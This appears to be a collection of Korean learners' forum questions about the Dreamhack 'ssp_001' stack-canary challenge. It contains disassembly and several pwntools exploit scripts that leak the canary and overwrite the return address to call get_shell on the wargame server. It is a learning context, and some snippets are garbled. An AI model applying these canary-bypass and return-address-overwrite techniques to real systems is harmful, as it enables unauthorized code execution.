ssp_001

몇번을 계산해봤는데도 자꾸 차이가 6이 나오네요 name_len은 int형이니까 차이가 4가 나와야 할텐데.. 제가 혹시 계산을 잘못한걸까요?? 그런거면 너무 창피할듯... 0x0804872b <+0>: push ebp 0x0804872c <+1>: mov ebp,esp 0x0804872e <+3>: push edi 0x0804872f <+4>: sub esp,0x94 0x08048735 <+10>: mov eax,DWORD PTR [ebp+0xc] 0x08048738 <+13>: mov DWORD PTR [ebp-0x98],eax 0x0804873e <+19>: mov eax,gs:0x14 0x08048744 <+25>: mov DWORD PTR [ebp-0x8],eax 0x08048747 <+28>: xor eax,eax 0x08048749 <+30>: lea edx,[ebp-0x88] 0x0804874f <+36>: mov eax,0x0 0x08048754 <+41>: mov ecx,0x10 0x08048759 <+46>: mov edi,edx 0x0804875b <+48>: rep stos DWORD PTR es:[edi],eax 0x0804875d <+50>: lea edx,[ebp-0x48] 0x08048760 <+53>: mov eax,0x0 0x08048765 <+58>: mov ecx,0x10 0x0804876a <+63>: mov edi,edx 0x0804876c <+65>: rep stos DWORD PTR es:[edi],eax 0x0804876e <+67>: mov WORD PTR [ebp-0x8a],0x0 0x08048777 <+76>: mov DWORD PTR [ebp-0x94],0x0 0x08048781 <+86>: mov DWORD PTR [ebp-0x90],0x0 0x0804878b <+96>: call 0x8048672 <initialize> 0x08048790 <+101>: call 0x80486f1 <menu> 0x08048795 <+106>: push 0x2 0x08048797 <+108>: lea eax,[ebp-0x8a] 0x0804879d <+114>: push eax 0x0804879e <+115>: push 0x0 0x080487a0 <+117>: call 0x80484a0 <read@plt> 0x080487a5 <+122>: add esp,0xc 0x080487a8 <+125>: movzx eax,BYTE PTR [ebp-0x8a] 0x080487af <+132>: movsx eax,al 0x080487b2 <+135>: cmp eax,0x46 0x080487b5 <+138>: je 0x80487c6 <main+155> 0x080487b7 <+140>: cmp eax,0x50 0x080487ba <+143>: je 0x80487eb <main+192> 0x080487bc <+145>: cmp eax,0x45 0x080487bf <+148>: je 0x8048824 <main+249> 0x080487c1 <+150>: jmp 0x804887a <main+335> 0x080487c6 <+155>: push 0x804896c 0x080487cb <+160>: call 0x80484b0 <printf@plt> 0x080487d0 <+165>: add esp,0x4 0x080487d3 <+168>: push 0x40 0x080487d5 <+170>: lea eax,[ebp-0x88] 0x080487db <+176>: push eax 0x080487dc <+177>: push 0x0 0x080487de <+179>: call 0x80484a0 <read@plt> 0x080487e3 <+184>: add esp,0xc 0x080487e6 <+187>: jmp 0x804887a <main+335> 0x080487eb <+192>: push 0x8048979 0x080487f0 <+197>: call 0x80484b0 <printf@plt> 0x080487f5 <+202>: add esp,0x4 0x080487f8 <+205>: lea eax,[ebp-0x94] 0x080487fe <+211>: push eax 0x080487ff <+212>: push 0x804898a 0x08048804 <+217>: call 0x8048540 <__isoc99_scanf@plt> 0x08048809 <+222>: add esp,0x8 0x0804880c <+225>: mov eax,DWORD PTR [ebp-0x94] 0x08048812 <+231>: push eax 0x08048813 <+232>: lea eax,[ebp-0x88] 0x08048819 <+238>: push eax 0x0804881a <+239>: call 0x80486cc <print_box> 0x0804881f <+244>: add esp,0x8 0x08048822 <+247>: jmp 0x804887a <main+335> 0x08048824 <+249>: push 0x804898d 0x08048829 <+254>: call 0x80484b0 <printf@plt> 0x0804882e <+259>: add esp,0x4 0x08048831 <+262>: lea eax,[ebp-0x90] 0x08048837 <+268>: push eax 0x08048838 <+269>: push 0x804898a 0x0804883d <+274>: call 0x8048540 <__isoc99_scanf@plt> 0x08048842 <+279>: add esp,0x8 0x08048845 <+282>: push 0x804899a 0x0804884a <+287>: call 0x80484b0 <printf@plt> 0x0804884f <+292>: add esp,0x4 0x08048852 <+295>: mov eax,DWORD PTR [ebp-0x90] 0x08048858 <+301>: push eax 0x08048859 <+302>: lea eax,[ebp-0x48] 0x0804885c <+305>: push eax 0x0804885d <+306>: push 0x0 0x0804885f <+308>: call 0x80484a0 <read@plt> 0x08048864 <+313>: add esp,0xc 0x08048867 <+316>: mov eax,0x0 0x0804886c <+321>: mov edx,DWORD PTR [ebp-0x8] 0x0804886f <+324>: xor edx,DWORD PTR gs:0x14 0x08048876 <+331>: je 0x8048884 <main+345> 0x08048878 <+333>: jmp 0x804887f <main+340> 0x0804887a <+335>: jmp 0x8048790 <main+101> 0x0804887f <+340>: call 0x80484e0 <__stack_chk_fail@plt> 0x08048884 <+345>: mov edi,DWORD PTR [ebp-0x4] 0x08048887 <+348>: leave 0x08048888 <+349>: ret `

안녕하세요, 문제를 풀 땐 분석하면 각 변수별 위치를 알 수 있긴 한데요. 알기로는 변수는 역순으로 stack에 들어간다고 알고 있습니다. 제공되는 소스코드를 보면 unsigned char box[0x40] = {}; char name[0x40] = {}; int name_len = 0; 뭐 이런 순서인데요.. (다른 변수들은 편의상 생략했습니다.) 그런데, 실제 stack을 분석해보면 ebp 기준으로 가까운 것이 name -> box -> name_len 이네요. 그런데 역순이면 ebp 기준으로 가까운 것이 box -> name -> name_len 이 되어야 하는 것 아닌가요? 역순이 아닌, 순서가 정해지는 다른 기준이 있는 것인지 궁금합니다.

from pwn import * p = remote('host3.dreamhack.games', 21344) e = ELF('./ssp') pay = b'a'*129 p.sendafter(b'> ',b'F') p.sendafter(b'box input : ', pay) p.sendafter(b'> ',b'P') p.sendlineafter('Element index : ', '131') p.recvuntil(b'Element of index 131 is : ') canary = p.recv(2) p.sendafter(b'> ',b'P') p.sendlineafter(b'Element index : ',b'130') p.recvuntil(b'Element of index 130 is : ') canary += p.recv(2) p.sendafter(b'> ',b'P') p.sendlineafter(b'Element index : ',b'129') p.recvuntil(b'Element of index 129 is : ') canary += p.recv(2) p.sendafter(b'> ',b'P') p.sendlineafter(b'Element index : ',b'128') p.recvuntil(b'Element of index 128 is : ') canary += p.recv(2) success(canary) canary = int(canary,16) success('p sent') address = 0x080486b9 payload = b'a'64 + p32(canary) + b'a'0x8 + p32(address) p.sendafter(b'> ',b'E') p.sendlineafter(b'Name Size : ',b'1000') p.sendafter(b'Name : ', payload) p.interactive() 위는 제가 작성한 코드입니다. 카나리와 관련해서 질문이 있습니다. 처음에 카나리값을 128~131까지 받아와서 저장한 뒤 payload를 보낼 때 p32(canary)를 해주면 될 것이라고 생각해서 해봤는데 안되었습니다. 하지만 카나리를 역순으로 받으니 문제가 해결되더라고요. 질문사항은 아래와 같습니다. 위 코드대로 했을 때는 처음에 recv를 통해서 만들어진 canary 값은 원래 값의 역순일 것입니다.(예를 들어 원래 카나리 값이 00112233 이렇다면 저기의 canary는 33221100이겠죠) 그런데 이렇게 만들어진 카나리에 p32()를 씌워버리면 다시 00112233이 되니까 페이로드를 보낼 때 리틀엔디언방식(즉 역순)으로 보내지는 것이 아니라서 처음에 받을 때 순방향으로 받고 p32()로 리틀엔디언 패킹을 해줘야 하는게 아닌가요? 이렇게 생각한 이유는 address의 경우 순방향 값인 0x080486b9을 address에 넣은 뒤 p32()로 페이로드에 작성했으므로 canary도 처음에 순방향으로 받고 이후에 p32()로 리틀엔디언 패킹을 해줘야한다고 생각해서입니다.

pwndbg> disas main Ambiguous command "disas main": disasm, disassemble. pwndbg> disasm main This is not a hex string This command is deprecated in Pwndbg. Please use the GDB's built-in syntax for running shell commands instead: !disasm <args> 어떻게 해결해야하나요..?

ssp 강의를 보고 난뒤 ssp_001 문제를 풀려고 시도했습니다. 폰툴로 익스플로잇 코드를 짜는데 제가 생각한 이론을 토대로 페이로드가 작동하지 않아서 다른 분들의 롸업을 보았는데, 제가 원래 알고있던 것과는 달리 카나리와 SFP **사이에 4바이트크기의 **dummy 가 존재 했습니다. 왜 이러한 더미값이 존재하는지가 궁금합니다!

File Name: test.py from pwn import * from struct import pack context.log_level = 'debug' HOST = 'host3.dreamhack.games' PORT = 20661 #p = remote(HOST, PORT) p = process("./ssp_001") get_shell = 0x80486b9 canary find cnry = b'' for i in range(4): p.sendafter(b"> ", b"P") p.recvuntil(b"Element index : ") p.sendline(str(128 + i)) p.recvuntil(b"is : ") cnry += p.recvn(2) cnry = int(cnry, 16) print(cnry) cnry = pack("<i", cnry) Payload Write payload = b'A'*64 payload += cnry payload += b"B"*4 payload += b"C"*4 payload += p32(get_shell) Exploit p.sendafter(b"> ", b"E") p.sendafter(b": ", b"100") p.recvuntil(b": ") p.send(payload) p.interactive test.py 실행 후 전체 사진 질문 : "Name size: " 수신 받고 100 바이트 문자열로 보내면 다음 응답을 못 받아오고 멈추네요. 다음 받아야 할 문자가 "Name : " 이니깐, recvuntil(": ") recvuntil("Name : ") sendafter("Name : ", payload) 등.. 다른 걸로 바꿔서 넣어봐도 그대로에요. 초보라 뭘 놓치고 있는 건지 모르겠네요 뭐가 문제인지 아시는 분은 알려주세요 ㅠㅠ

익스플로잇 코드를 암만 들여다 봐도 왜 안되는 지 모르겠어서 질문합니다..... 어디가 잘못되었는지 궁금합니다. <Exploit Code> 1 #!/usr/bin/python3 2 from pwn import * 3 4 p = remote("host3.dreamhack.games", 15608) 5 6 shell_addr = 0x80486b9 7 canary = b"" 8 9 for i in range(4) : 10 p.recvuntil("> ") 11 p.send("P") 12 p.recvuntil("index : ") 13 p.sendline(str(0x80 + i)) 14 p.recvuntil("is : ") 15 canary += p.recvn(2) 16 17 canary = int(canary, 16) 18 19 payload = b"A"*0x40 20 payload += p32(canary) 21 payload += b"B"*0x4 22 payload += b"C"*0x4 23 payload += p32(shell_addr) 24 25 p.recvuntil("> ") 26 p.send("E") 27 p.recvuntil("Size : ") 28 p.sendline(str(len(payload))) 29 p.recvuntil("Name : ") 30 p.send(payload) 31 p.interactive() <실행 후 화면>

일단 canary 값이 제대로 출력되는지 확인해보려고 했는데, 아래와 같이 실행 결과가 나옵니다 python ssp_001.py [+] Starting local process './ssp_001': pid 35290 [F]ill the box [P]rint the box [E]xit Name Size : Name : stack smashing detected *: terminated [*] Stopped process './ssp_001' (pid 35290) 강의 보면 canary+1까지 값을 채워넣으면 뒤에 값이 같이 출력되서 65개를 넣은건데 제가 잘못 이해했나요? 파이썬 코드는 아래와 같습니다 from pwn import * p = process("./ssp_001") payload = “A”*65 print(p.recvuntil("> ")) p.sendline(“E”) print(p.recvuntil("Name Size : ")) p.sendline(“1024”) print(p.recvuntil("Name : ")) p.sendline(payload) print(p.recv(1024)) `

워게임중 pwndbg를통해 디버깅을 하려고 하는데 다음과 같이 에러가나네요 64비트 운영체제에서 32비트바이너리 파일을 하려다 보니 생기는 문제같은데 해결방법을 아시는분 계실까요..?? pwndbg> b *main Breakpoint 1 at 0x804872b pwndbg> r Starting program: /home/seonghun/stackcanary/ssp_001 /bin/bash: /home/seonghun/stackcanary/ssp_001: cannot execute binary file: Exec format error /bin/bash: /home/seonghun/stackcanary/ssp_001: Success During startup program exited with code 126.

... payload = b"a"64 + p32(canary) + b"b"0x8 + shellcode ... payload 에서 쉘공격이 막혀 원인을 알아봤지만, get_shell함수의 주소와 canary 값의 패킹엔 문제가 없다고 생각했습니다. 그래서 혹시 sfp 값이 잘못인가? 하여 b"b"0x4 -> b"b"0x8 로 바꿔봤습니다. 그랬더니 exploit 이 가능해졌습니다.. mov dword ptr[ebp- 0x8], eax 파트에서 분명 8byte 만큼을 할당하고, 4byte 는 Canary 나머지 4byte 는 SFP 라고 생각했습니다만.. 왜 8byte가 되는것인지 궁금합니다.